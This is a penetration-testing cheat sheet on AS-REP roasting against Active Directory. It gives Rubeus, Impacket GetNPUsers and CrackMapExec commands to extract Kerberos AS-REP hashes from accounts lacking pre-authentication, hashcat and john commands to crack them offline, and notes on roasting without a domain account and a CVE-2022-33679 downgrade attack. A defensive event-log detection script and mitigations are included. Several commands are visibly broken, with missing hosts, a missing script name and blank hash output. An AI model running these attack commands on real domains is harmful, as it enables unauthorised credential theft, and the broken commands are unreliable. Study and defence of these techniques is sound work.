PenTest – Roasting – ASREP Roasting

If a domain user does not have Kerberos pre-authentication enabled, an AS-REP can be requested for that user without knowing their password, and the encrypted part of the response (keyed with the user's password) can be cracked offline, much like Kerberoasting.

Requirements:
  • Accounts with the attribute DONT_REQ_PREAUTH (PowerView > Get-DomainUser -PreauthNotRequired -Properties distinguishedname -Verbose)

  • Rubeus
    C:\Rubeus>Rubeus.exe asreproast /user:TestOU3user /format:hashcat /outfile:hashes.asreproast
    [*] Action: AS-REP roasting
    [*] Target User            : TestOU3user
    [*] Target Domain          : testlab.local
    [*] SamAccountName         : TestOU3user
    [*] DistinguishedName      : CN=TestOU3user,OU=TestOU3,OU=TestOU2,OU=TestOU1,DC=testlab,DC=local
    [*] Using domain controller: testlab.local (
    [*] Building AS-REQ (w/o preauth) for: 'testlab.local\TestOU3user'
    [*] Connecting to
    [*] Sent 169 bytes
    [*] Received 1437 bytes
    [+] AS-REQ w/o preauth successful!
    [*] AS-REP hash:


  • GetNPUsers from Impacket Suite
    # single user, no credentials needed when pre-auth is disabled
    $ python GetNPUsers.py htb.local/svc-alfresco -no-pass
    [*] Getting TGT for svc-alfresco
    # extract hashes from a user list (no domain account available)
    root@kali:impacket-examples$ python GetNPUsers.py jurassic.park/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast
    # extract hashes using a valid domain account to look up DONT_REQ_PREAUTH users via LDAP
    root@kali:impacket-examples$ python GetNPUsers.py jurassic.park/triceratops:Sh4rpH0rns -request -format hashcat -outputfile hashes.asreproast


  • CrackMapExec Module
    $ crackmapexec ldap -u 'username' -p 'password' --kdcHost --asreproast output.txt
    LDAP       389    dc01           $krb5asrep$23$john.doe@LAB.LOCAL:5d1f750[...]2a6270d7$096fc87726c64e545acd4687faf780[...]13ea567d5


Use hashcat or john to crack the recovered AS-REP hash.

# crack AS_REP messages with hashcat
root@kali:impacket-examples$ hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt 
root@windows:hashcat$ hashcat64.exe -m 18200 '<AS_REP-hash>' -a 0 c:\wordlists\rockyou.txt

# crack AS_REP messages with john
C:\Rubeus> john --format=krb5asrep --wordlist=passwords_kerb.txt hashes.asreproast

Mitigations:
  • All accounts must have « Kerberos Pre-Authentication » enabled (enabled by default).
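A defender-side check for the two points above (AS-REQs answered without pre-authentication, and accounts carrying DONT_REQ_PREAUTH), written as an added example for this page rather than code from Rubeus, Impacket or CrackMapExec. It assumes Windows event 4768 records flattened to key=value form; the sample records are constructed.

```python
"""Added example (not from Rubeus/Impacket/CME): flag event 4768 records where
the KDC answered an AS-REQ with no pre-auth (Pre-Authentication Type 0) using
RC4 (0x17), i.e. the condition that yields a hashcat -m 18200 hash, and list
accounts whose userAccountControl has the DONT_REQ_PREAUTH bit set."""
import re

DONT_REQ_PREAUTH = 0x400000  # UAC bit behind Get-DomainUser -PreauthNotRequired

# Constructed sample events, flattened to key=value (real 4768 events put each
# field on its own line): a normal AES logon, a roastable account being hit,
# and an RC4 logon that still used pre-auth (weak crypto, but not a roast).
SAMPLE_4768 = [
    "EventID=4768 Account Name=jsmith Ticket Encryption Type=0x12 "
    "Pre-Authentication Type=2 Result Code=0x0 Client Address=10.0.0.5",
    "EventID=4768 Account Name=TestOU3user Ticket Encryption Type=0x17 "
    "Pre-Authentication Type=0 Result Code=0x0 Client Address=10.0.0.99",
    "EventID=4768 Account Name=svc-backup Ticket Encryption Type=0x17 "
    "Pre-Authentication Type=2 Result Code=0x0 Client Address=10.0.0.7",
]
FIELD = re.compile(r"(Account Name|Ticket Encryption Type|Pre-Authentication Type"
                   r"|Result Code|Client Address)=(\S+)")

def parse_4768(line):
    """Return the fields of a 4768 record as a dict, or None for other events."""
    if "EventID=4768" not in line:
        return None
    return dict(FIELD.findall(line))

def is_asrep_roast(ev):
    """No pre-auth + RC4 + success: the AS-REP carries an offline-crackable blob."""
    return (ev.get("Pre-Authentication Type") == "0"
            and ev.get("Ticket Encryption Type") == "0x17"
            and ev.get("Result Code") == "0x0")

def find_roasted(lines):
    """(account, client address) for every record that looks like a roast."""
    hits = []
    for line in lines:
        ev = parse_4768(line)
        if ev and is_asrep_roast(ev):
            hits.append((ev["Account Name"], ev["Client Address"]))
    return hits

def accounts_without_preauth(users):
    """users: (sAMAccountName, userAccountControl) pairs from an LDAP export;
    these are the accounts the mitigation above says to fix."""
    return [name for name, uac in users if uac & DONT_REQ_PREAUTH]
```

The third sample record is deliberately not flagged: RC4 with pre-auth is a cipher-hygiene finding, not evidence of roasting.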

Kerberoasting w/o domain account

In September 2022 Charlie Clark showed that service tickets (STs) can be obtained through a KRB_AS_REQ without controlling any Active Directory account. If a principal can authenticate without pre-authentication (as in the AS-REP Roasting attack), it can be used to send a KRB_AS_REQ that asks for a ST instead of an encrypted TGT, by modifying the sname attribute in the req-body part of the request.

The technique is fully explained in this article: Semperis blog post.

⚠ You must provide a list of users, because without a valid account this technique cannot query LDAP for them.


CVE-2022-33679 performs an encryption downgrade attack: it forces the KDC to use the RC4-MD4 algorithm and then brute-forces the session key from the AS-REP using a known-plaintext attack. Like AS-REP Roasting, it works against accounts that have pre-authentication disabled, and the attack is unauthenticated, so no client password is needed.

Research from Project Zero:

Requirements:
  • Accounts with the attribute DONT_REQ_PREAUTH (PowerView > Get-DomainUser -PreauthNotRequired -Properties distinguishedname -Verbose)

  • using
    user@hostname:~$ python DOMAIN.LOCAL/User DC01.DOMAIN.LOCAL
    user@hostname:~$ export KRB5CCNAME=/home/project/User.ccache
    user@hostname:~$ crackmapexec smb DC01.DOMAIN.LOCAL -k --shares

Mitigations:
  • All accounts must have « Kerberos Pre-Authentication » enabled (enabled by default).
  • Disable the RC4 cipher if possible.

